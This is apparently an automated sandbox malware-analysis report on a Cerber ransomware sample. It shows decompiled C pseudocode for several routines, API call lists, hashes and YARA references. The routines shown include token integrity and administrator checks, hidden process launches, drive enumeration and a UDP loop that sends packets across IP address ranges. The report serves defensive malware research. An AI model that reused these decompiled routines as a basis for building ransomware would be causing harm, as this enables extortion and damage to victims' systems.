									StrCpyNW(0x42fe98, _t54, (_t36 - _t54 >> 1) + 1);
									_v5 = 1;
								}
							}
						}
					}
					E00405463(_v12);
					goto L7;
				}
			}

0x0040b554
0x0040b558
0x0040b57e
0x0040b582
0x0040b587
0x0040b64b
0x0040b650
0x0040b58d
0x0040b591
0x0040b597
0x0040b59b
0x0040b5af
0x0040b5c0
0x0040b5ce
0x0040b5d6
0x0040b5da
0x0040b5e0
0x0040b5e4
0x0040b5f2
0x0040b5fa
0x0040b5fa
0x0040b5fe
0x0040b604
0x0040b608
0x0040b616
0x0040b61e
0x0040b61e
0x0040b622
0x0040b62a
0x0040b638
0x0040b63e
0x0040b63e
0x0040b62a
0x0040b608
0x0040b5e4
0x0040b645
0x00000000
0x0040b64a

APIs

Part of subcall function 0040B08E: RegOpenKeyExW.ADVAPI32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
Part of subcall function 0040B08E: RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
Part of subcall function 0040B08E: RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
Part of subcall function 0040B08E: RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E

StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
GetTempPathW.KERNEL32(00000104,0042FBC8,?,00000000,?,?,00000000), ref: 0040B5C0
lstrcatW.KERNEL32(0042FBC8,?), ref: 0040B5CE
StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
StrCpyNW.SHLWAPI(0042FDD0,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
StrCpyNW.SHLWAPI(0042FB00,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
StrCpyNW.SHLWAPI(0042FE98,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpenPathTemplstrcat
String ID:
API String ID: 3283998727-0
Opcode ID: 3cd2aa2785f18796cf27a8dfd0db405cd6b0d8585c89bf5c46c041bb4523753b
Instruction ID: 32be6bc6edbcde913aa383d40c1836da8f2025cb8ba36b10733c938e06cc4411
Opcode Fuzzy Hash: 3cd2aa2785f18796cf27a8dfd0db405cd6b0d8585c89bf5c46c041bb4523753b
Instruction Fuzzy Hash: C52126779006227AD32057A49D0EFAF3E68DF84B00F040836F954F22C1EF75DA0586AE

Uniqueness

Uniqueness Score: -1.00%

Function 00406005 Relevance: 15.1, APIs: 10, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406005(void* __ecx) {
				long _v8;
				void* _v12;
				long _t30;
				void* _t33;

				_t30 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
					_v8 = 0;
					if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
						_t33 = LocalAlloc(0x40, _v8);
						if(_t33 != _t30) {
							if(GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8) != 0) {
								_t30 =  *(GetSidSubAuthority( *_t33,  *(GetSidSubAuthorityCount( *_t33)) - 0x00000001 & 0x000000ff));
							}
							LocalFree(_t33);
						}
					}
					CloseHandle(_v12);
				}
				return _t30;
			}

0x0040600f
0x00406013
0x00406025
0x00406032
0x0040603d
0x00406056
0x0040605a
0x00406071
0x0040608b
0x0040608b
0x0040608e
0x0040608e
0x00406094
0x00406098
0x00406098
0x004060a2

APIs

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,00000000,?,004067F8), ref: 00406016
OpenProcessToken.ADVAPI32(00000000,?,004067F8), ref: 0040601D
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,004067F8), ref: 00406035
GetLastError.KERNEL32(?,004067F8), ref: 0040603F
LocalAlloc.KERNEL32(00000040,?,00000000,?,004067F8), ref: 00406050
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,004067F8), ref: 00406069
GetSidSubAuthorityCount.ADVAPI32(00000000,?,004067F8), ref: 00406075
GetSidSubAuthority.ADVAPI32(00000000,?,?,004067F8), ref: 00406085
LocalFree.KERNEL32(00000000,?,004067F8), ref: 0040608E
CloseHandle.KERNEL32(?,004067F8), ref: 00406098

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpen
String ID:
API String ID: 2123698122-0
Opcode ID: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
Instruction ID: 8cb5e333a96f95fad98f0925d080cf7ecd4ccd4366d947745b1979e041030130
Opcode Fuzzy Hash: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
Instruction Fuzzy Hash: E911467A600104FFDB219FA1DD08DAE7F79EB45711F1000B9F906F26A0D7359A18EB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8DF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040A8DF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, char _a12) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				long _v32;
				intOrPtr _v36;
				char _v44;
				char _v68;
				short _v592;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t50;
				intOrPtr _t61;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t88;
				void* _t89;
				long _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t87 = __edx;
				_t79 = __ecx;
				E00402C20(_t77, __edx, _t88, _t92);
				_t95 = _t94 + 0x14;
				_v32 = GetTickCount();
				 *0x40f1d8( &_v68, _a4, E0040591C(0x40d8b4, 0x13, 0x682561bd));
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 0;
				_v20 = 0;
				_t78 = E0040622D(_t77, _t79);
				GetSystemDirectoryW( &_v592, 0x104);
				_v36 = E0040A0A4();
				_t89 = 0;
				do {
					_t50 = E0040A892(_v36,  &_v44);
					_pop(_t82);
					if(_t50 >= 2 && (_t50 <= 3 || _t50 == 6)) {
						_t22 =  &_v20; // 0x406633
						E0040A80E(_t82, _t78,  &_v44, _t22,  &_v68,  &_v16,  &_v12,  &_v28,  &_v24, (_v592 & 0xffffff00 | _v592 == _v44) & 0x000000ff);
						_t95 = _t95 + 0x24;
					}
					_t89 = _t89 + 1;
				} while (_t89 <= 0x19);
				E0040630E(_t78);
				E0040634B(_t78, _t78);
				_t90 = GetTickCount();
				if(E00402C54(_t87, _a4) != 0) {
					_push(_t90 - _v32);
					_push(E0040591C( &E0040D8C8, 0x1f, 0x34d17065));
					_push(_a4);
					E00402C20(_t78, _t87, _t90 - _v32, 0);
				}
				if(_v20 != 0) {
					_t61 = _v16;
					if(_v12 != 0) {
						 *_v28 = _t61;
					} else {
						_v12 = _t61;
					}
					 *_a8 = _v12;
					_t35 =  &_a12; // 0x406633
					 *((intOrPtr*)( *_t35)) = _v24;
				}
				 *0x40f1e0( &_v68);
				return 0 | _v20 != 0x00000000;
			}

0x0040a8df
0x0040a8df
0x0040a900
0x0040a905
0x0040a90e
0x0040a915
0x0040a91d
0x0040a920
0x0040a923
0x0040a926
0x0040a929
0x0040a931
0x0040a93f
0x0040a94a
0x0040a94d
0x0040a94f
0x0040a958
0x0040a95e
0x0040a962
0x0040a994
0x0040a99d
0x0040a9a2
0x0040a9a2
0x0040a9a5
0x0040a9a6
0x0040a9ad
0x0040a9b4
0x0040a9c2
0x0040a9cc
0x0040a9d1
0x0040a9e6
0x0040a9e7
0x0040a9ea
0x0040a9ef
0x0040a9f5
0x0040a9f7
0x0040a9fd
0x0040aa07
0x0040a9ff
0x0040a9ff
0x0040a9ff
0x0040aa0f
0x0040aa14
0x0040aa17
0x0040aa17
0x0040aa1d
0x0040aa2f

APIs

GetTickCount.KERNEL32 ref: 0040A908
RtlInitializeCriticalSection.NTDLL(?), ref: 0040A915
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040A93F

Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
Part of subcall function 0040A0A4: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
Part of subcall function 0040A0A4: RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
Part of subcall function 0040A0A4: RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138

Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4

GetTickCount.KERNEL32 ref: 0040A9B9
RtlDeleteCriticalSection.NTDLL(?), ref: 0040AA1D

Strings

3f@, xrefs: 0040A994, 0040A997
3f@, xrefs: 0040AA14
0jt, xrefs: 0040A908, 0040A9B9

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CountCriticalSectionTick$CloseDeleteDirectoryDrivesInitializeLogicalOpenQuerySystemValuelstrcpy
String ID: 0jt$3f@$3f@
API String ID: 4201821548-612658434
Opcode ID: b962030eb37cd2a6a6e22f3845ed40c2f4150b5a5231ea02f09655b7e2ab6385
Instruction ID: 694c260ad55fdb15e18b233715df8a646d2816963bf82ac05ff2a62387601ac6
Opcode Fuzzy Hash: b962030eb37cd2a6a6e22f3845ed40c2f4150b5a5231ea02f09655b7e2ab6385
Instruction Fuzzy Hash: 92416FB2D00219ABCB11AFE5DC458EF7BB8EF48310F10443BF501F6281EA388A55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402D06 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00402D06(void* _a4) {
				void _v8;
				long _v12;
				char _v16;
				void _v20;
				char _v88;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if( *0x43072c < 6) {
					L5:
					if(DuplicateToken(_a4, 1,  &_v8) == 0) {
						L8:
						return 0 | _v16 != 0x00000000;
					}
					L6:
					_push( &_v12);
					_push( &_v88);
					_push(0);
					_push(0x1a);
					_v12 = 0x44;
					if( *0x40f93c() != 0) {
						 *0x40faa4(_v8,  &_v88,  &_v16);
						CloseHandle(_v8);
					}
					goto L8;
				}
				if(GetTokenInformation(_a4, 0x12,  &_v20, 4,  &_v12) == 0 || _v20 == 3 && GetTokenInformation(_a4, 0x13,  &_v8, 4,  &_v12) == 0) {
					goto L8;
				} else {
					if(_v8 != 0) {
						goto L6;
					}
					goto L5;
				}
			}

0x00402d16
0x00402d19
0x00402d1c
0x00402d1f
0x00402d5e
0x00402d6f
0x00402da7
0x00402db1
0x00402db1
0x00402d71
0x00402d74
0x00402d78
0x00402d79
0x00402d7a
0x00402d7c
0x00402d8b
0x00402d98
0x00402da1
0x00402da1
0x00000000
0x00402d8b
0x00402d38
0x00000000
0x00402d59
0x00402d5c
0x00000000
0x00000000
0x00000000
0x00402d5c

APIs

GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
CloseHandle.KERNEL32(?), ref: 00402DA1

Strings

D, xrefs: 00402D7C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Token$Information$CheckCloseCreateDuplicateHandleKnownMembershipWell
String ID: D
API String ID: 476757601-2746444292
Opcode ID: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
Instruction ID: 0d410c75a1abfc5775d22fac195d72f8047e95bba00665c990917ff8bb71829a
Opcode Fuzzy Hash: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
Instruction Fuzzy Hash: 9F21CA71A00218FFEF10DF91CE49AEEBBB8EF04740F004076A601E5190D7789A48DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040137F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040137F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				int _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				void* __esi;
				void* __ebp;

				_push(_a4);
				_push(0x42f690);
				_v8 = 0;
				_push(E00405905(0x40ceb4, 0x11, 0x65f84038));
				_push( &_v8);
				E00405B59(__ebx, __ecx, __edi, 0, __eflags);
				memset( &(_v92.lpReserved), 0, 0x40);
				_v92.cb = 0x44;
				if(CreateProcessA(0, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24) != 0) {
					if(WaitForSingleObject(_v24.hProcess, 0x1388) == 0x102) {
						TerminateProcess(_v24.hProcess, 0);
					}
					CloseHandle(_v24);
					CloseHandle(_v24.hThread);
				}
				return E00405463(_v8);
			}

0x00401386
0x0040138b
0x0040139c
0x004013a7
0x004013ab
0x004013ac
0x004013b8
0x004013d5
0x004013e5
0x004013fa
0x00401400
0x00401400
0x00401409
0x00401412
0x00401412
0x00401422

APIs

memset.NTDLL ref: 004013B8
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412

Strings

D, xrefs: 004013D5

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateObjectSingleTerminateWaitmemset
String ID: D
API String ID: 1471562994-2746444292
Opcode ID: 02a6747f236ae747b7cebf3ec0865747d83315405aff740321669886b7dc3b32
Instruction ID: ddf5f14e466ed530b43ca890467a1ba3be817bc74457b95caa82e618a00c64c9
Opcode Fuzzy Hash: 02a6747f236ae747b7cebf3ec0865747d83315405aff740321669886b7dc3b32
Instruction Fuzzy Hash: 0B117971841128BBCB21ABA1CD0AECF7F3CEF00751F200076F605B60E1DA795A04DAE9

Uniqueness

Uniqueness Score: -1.00%

Function 00407341 Relevance: 10.8, APIs: 7, Instructions: 267
networkCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00407341(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v6;
				char _v7;
				char _v8;
				char _v9;
				intOrPtr _v13;
				intOrPtr _v14;
				intOrPtr _v15;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				signed int _v28;
				char _v29;
				char _v30;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				short _v54;
				char _v56;
				char* _v60;
				char _v64;
				intOrPtr _v68;
				signed char _v84;
				char _v188;
				char _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t83;
				void* _t87;
				void* _t90;
				signed int _t93;
				char* _t98;
				long _t106;
				void* _t108;
				signed short _t111;
				short _t114;
				intOrPtr _t115;
				void* _t117;
				intOrPtr _t120;
				char _t135;
				char _t136;
				char _t141;
				void* _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t150;
				signed int _t152;
				void* _t159;
				void* _t168;
				signed int _t172;
				char _t175;
				void* _t176;
				CHAR* _t178;
				short _t181;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t191;
				void* _t192;
				signed int _t199;

				_t168 = __edx;
				_v9 = 0;
				_t83 = E00405905(0x40d534, 7, 0xfd311b35);
				_t185 = _t184 + 0xc;
				_t176 = E004031AF(_a4, __eflags, _t83);
				_t196 = _t176;
				if(_t176 != 0) {
					_t87 = E00405905( &E0040D53C, 0xa, 0xfcf57ebc);
					_t186 = _t185 + 0xc;
					_t150 = E004031AF(_t176, _t196, _t87);
					_t197 = _t150;
					if(_t150 != 0) {
						_t90 = E00405905(0x40d548, 7, 0x9c7f3440);
						_t187 = _t186 + 0xc;
						_t93 = E00403253(E004031AF(_t150, _t197, _t90), _t197);
						_v20 = _v20 & 0x00000000;
						_v40 = _t93;
						if(_t93 == 0) {
							_t6 =  &_v40;
							 *_t6 = _v40 | 0xffffffff;
							_t199 =  *_t6;
						}
						_t169 = E004031AF(_t150, _t199, _a8);
						_t98 = E00401127(0, E004032B8(_t95, _t199));
						_v60 = _t98;
						if(_t98 != 0) {
							_t178 = E004078F0(_t98,  &_v20, _t168,  &_v20);
							_pop(_t159);
							_v24 = _t178;
							_t201 = _t178;
							if(_t178 != 0) {
								CharLowerBuffA(_t178, _v20);
								E0040AD86(_t159, _t178, _v20,  &_v84);
								_t106 = E00405BAA(_t150,  &_v24, _t169, _t178, _t201);
								_v20 = _t106;
								CharLowerBuffA(_v24, _t106);
								_t108 = E00405905(0x40d558, 4, 0x60ae4eaf);
								_t191 = _t187 + 0x30;
								_t111 = E00403253(E004031AF(_t150, _t201, _t108), _t201);
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t181 = 2;
								asm("stosw");
								_v56 = _t181;
								_t114 =  *0x40e020(_t111 & 0x0000ffff, _v20, E00405905(0x40d550, 4, 0x8ba91a9e), _v84 & 0x000000ff);
								_v54 = _t114;
								_t115 =  *0x40e000(_t181, _t181, 0x11);
								_v36 = _t115;
								_t202 = _t115 - 0xffffffff;
								if(_t115 != 0xffffffff) {
									_t117 = E00405905(0x40d560, _t181, 0x7d18c472);
									_t192 = _t191 + 0xc;
									_t183 = E004031AF(_t150, _t202, _t117);
									_t120 = E00403156(_t119, _t202);
									_v28 = _v28 & 0x00000000;
									_v68 = _t120;
									_t203 = _t120;
									if(_t120 != 0) {
										do {
											_push( &_v64);
											_push( &_v292);
											_push( &_v188);
											_push(E00405905(0x40d564, 0xb, 0xb32d2f4a));
											sscanf(E004032B8(E0040317B(_t183, _t203, _v28), _t203));
											_t192 = _t192 + 0x20;
											_t172 = E0040557F(_v64);
											_t152 = E00405532( &_v188) & _t172;
											_v16 =  !_t172 | _t152;
											_t175 = 0;
											_v32 = _t152;
											_v5 = _t152;
											if(_t152 <= _v16) {
												do {
													_v6 = _t152;
													if(_t152 <= _v15) {
														do {
															_t135 = _v30;
															while(1) {
																_v8 = _t135;
																if(_t135 > _v14) {
																	break;
																}
																_t136 = _v29;
																while(1) {
																	_v7 = _t136;
																	__eflags = _t136 - _v13;
																	if(_t136 > _v13) {
																		break;
																	}
																	_v52 = _v5;
																	_v51 = _v6;
																	_v50 = _v8;
																	_v49 = _v7;
																	_t141 = _t175;
																	_t175 = _t175 + 1;
																	__eflags = _t141 - _v40;
																	if(_t141 == _v40) {
																		_t175 = 0;
																		__eflags = 0;
																		Sleep(0x3e8);
																	}
																	E00402B21(_t152, _t168, _t175, _t183);
																	_t192 = _t192 + 0x1c;
																	_t146 =  *0x40e01c(_v36, _v24, _v20, 0,  &_v56, 0x10, _a4, E00405905(0x40d570, 0x13, 0xb66841e3), E0040555D(_v52), _v24);
																	__eflags = _t146 - _v20;
																	if(_t146 == _v20) {
																		_v9 = 1;
																	}
																	_t147 = _v7;
																	__eflags = _t147 - 0xff;
																	if(_t147 != 0xff) {
																		_t136 = _t147 + 1;
																		__eflags = _t136;
																		continue;
																	}
																	break;
																}
																_t148 = _v8;
																__eflags = _t148 - 0xff;
																if(__eflags != 0) {
																	_t135 = _t148 + 1;
																	__eflags = _t135;
																	continue;
																}
																break;
															}
															if(_v6 != 0xff) {
																goto L23;
															}
															goto L24;
															L23:
															_v6 = _v6 + 1;
														} while (_v6 <= _v15);
													}
													L24:
													if(_v5 != 0xff) {
														goto L25;
													}
													goto L26;
													L25:
													_v5 = _v5 + 1;
												} while (_v5 <= _v16);
											}
											L26:
											_v28 = _v28 + 1;
										} while (_v28 < _v68);
									}
									E00405568(_v36);
								}
								E00405463(_v24);
							}
							E00405463(_v60);
						}
					}
				}
				return _v9;
			}

0x00407341
0x00407359
0x0040735d
0x00407362
0x0040736e
0x00407371
0x00407373
0x00407385
0x0040738a
0x00407395
0x00407398
0x0040739a
0x004073ac
0x004073b1
0x004073bf
0x004073c4
0x004073c8
0x004073cd
0x004073cf
0x004073cf
0x004073cf
0x004073cf
0x004073de
0x004073e8
0x004073ee
0x004073f3
0x00407402
0x00407404
0x00407405
0x00407408
0x0040740a
0x00407414
0x00407422
0x0040744a
0x00407456
0x00407459
0x0040746b
0x00407470
0x0040747e
0x0040748b
0x0040748c
0x0040748d
0x00407490
0x00407491
0x00407496
0x0040749a
0x004074a4
0x004074a8
0x004074ae
0x004074b1
0x004074b4
0x004074c5
0x004074ca
0x004074d6
0x004074d8
0x004074dd
0x004074e1
0x004074e4
0x004074e6
0x004074ec
0x004074ef
0x004074f6
0x004074fd
0x00407512
0x00407524
0x0040752d
0x00407535
0x00407545
0x0040754b
0x0040754e
0x00407551
0x00407554
0x0040755a
0x00407560
0x00407560
0x00407566
0x0040756c
0x0040756c
0x00407614
0x00407614
0x0040761a
0x00000000
0x00000000
0x00407574
0x004075ff
0x004075ff
0x00407602
0x00407605
0x00000000
0x00000000
0x0040757f
0x00407585
0x0040758b
0x00407591
0x00407594
0x00407596
0x00407597
0x0040759a
0x004075a1
0x004075a1
0x004075a3
0x004075a3
0x004075ce
0x004075d3
0x004075e7
0x004075ed
0x004075f0
0x004075f2
0x004075f2
0x004075f6
0x004075f9
0x004075fb
0x004075fd
0x004075fd
0x00000000
0x004075fd
0x00000000
0x004075fb
0x0040760b
0x0040760e
0x00407610
0x00407612
0x00407612
0x00000000
0x00407612
0x00000000
0x00407610
0x00407624
0x00000000
0x00000000
0x00000000
0x00407626
0x00407626
0x0040762c
0x0040756c
0x00407635
0x00407639
0x00000000
0x00000000
0x00000000
0x0040763b
0x0040763b
0x00407641
0x00407560
0x0040764a
0x0040764a
0x00407650
0x004074ec
0x0040765c
0x00407661
0x00407665
0x00407665
0x0040766d
0x0040766d
0x004073f3
0x0040739a
0x00407679

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

CharLowerBuffA.USER32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407414
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?), ref: 00407459
htons.WS2_32 ref: 0040749A
socket.WS2_32(00000002,00000002,00000011), ref: 004074A8
sscanf.MSVCRT ref: 00407524

Part of subcall function 0040557F: htonl.WS2_32(?), ref: 0040558D

Part of subcall function 00405532: inet_addr.WS2_32(Cu@), ref: 00405537
Part of subcall function 00405532: gethostbyname.WS2_32(?), ref: 00405548

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BuffCharLower$gethostbynamehtonlhtonsinet_addrlstrcmpisocketsscanf
String ID:
API String ID: 2857926056-0
Opcode ID: fff0297137f3174a5ffad4f1bb4543e4105e68f35fac7bcfbf95552bbb5e5ba7
Instruction ID: 78b374b52b19eb6b1b31afc7c374d959c6df6e4001e96d7b0c5d057715c2210f
Opcode Fuzzy Hash: fff0297137f3174a5ffad4f1bb4543e4105e68f35fac7bcfbf95552bbb5e5ba7
Instruction Fuzzy Hash: E291F971D04248BEDF01ABF99C02AEF7F75AF05314F1404BAF454B62C2D6395A068B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00402438 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00402438(char __ebx, void* __edx, char _a4) {
				intOrPtr _v12;
				char _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t14;
				signed int _t19;
				char _t38;
				signed int _t39;
				void* _t41;
				void* _t44;
				void* _t45;
				void* _t46;
				signed int _t47;
				void* _t48;
				void* _t49;
				long _t50;
				void* _t52;
				void* _t53;
				void* _t54;

				_t44 = __edx;
				_t38 = __ebx;
				_t39 = 7;
				_t45 =  &_v36;
				memset(_t45, 0, _t39 << 2);
				_t54 = _t53 + 0xc;
				_t46 = _t45 + _t39;
				_t3 =  &_a4; // 0x40666c
				_v40 = __ebx;
				_v12 =  *_t3;
				_t14 = E00402C54(_t44, __ebx);
				_pop(_t41);
				if(_t14 != 0) {
					E00404CDC();
					_a4 = GetTickCount();
					_push(E0040591C(0x40d134, 0x14, 0xa9527bfc));
					_push(__ebx);
					E00402C20(__ebx, _t44, _t46, _t48);
					_t54 = _t54 + 0x14;
				}
				_t49 = E0040622D(_t38, _t41);
				 *0x40f1d8( &_v36);
				_t19 = 1;
				if( *0x42f79c != 0) {
					_t19 = E00405FF0() *  *0x42f798;
				}
				if(_t19 != 0) {
					_t47 = _t19;
					do {
						E00406309(_t49, _t41, _t52, E00401EB2,  &_v40);
						_t47 = _t47 - 1;
						_pop(_t41);
					} while (_t47 != 0);
				}
				E0040630E(_t49);
				E0040634B(_t49, _t38);
				_t50 = GetTickCount();
				if(E00402C54(_t44, _t38) != 0) {
					_t9 =  &_a4; // 0x40666c
					_t51 = _t50 -  *_t9;
					_push(_t50 -  *_t9);
					_push(E0040591C( &E0040D14C, 0x20, 0x4e29eca8));
					_push(_t38);
					E00402C20(_t38, _t44, _t46, _t51);
				}
				return  *0x40f1e0( &_v36);
			}

APIs

GetTickCount.KERNEL32 ref: 00402463
RtlInitializeCriticalSection.NTDLL(?), ref: 00402492
GetTickCount.KERNEL32 ref: 004024D9
RtlDeleteCriticalSection.NTDLL(?), ref: 00402512

Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(0042FBC8,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000), ref: 00404CE8
Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(0042FBC8,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(0042FBC8,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E

Strings

lf@, xrefs: 0040244A, 004024EC, 004024EF
0jt, xrefs: 00402463, 004024D9

Memory Dump Source

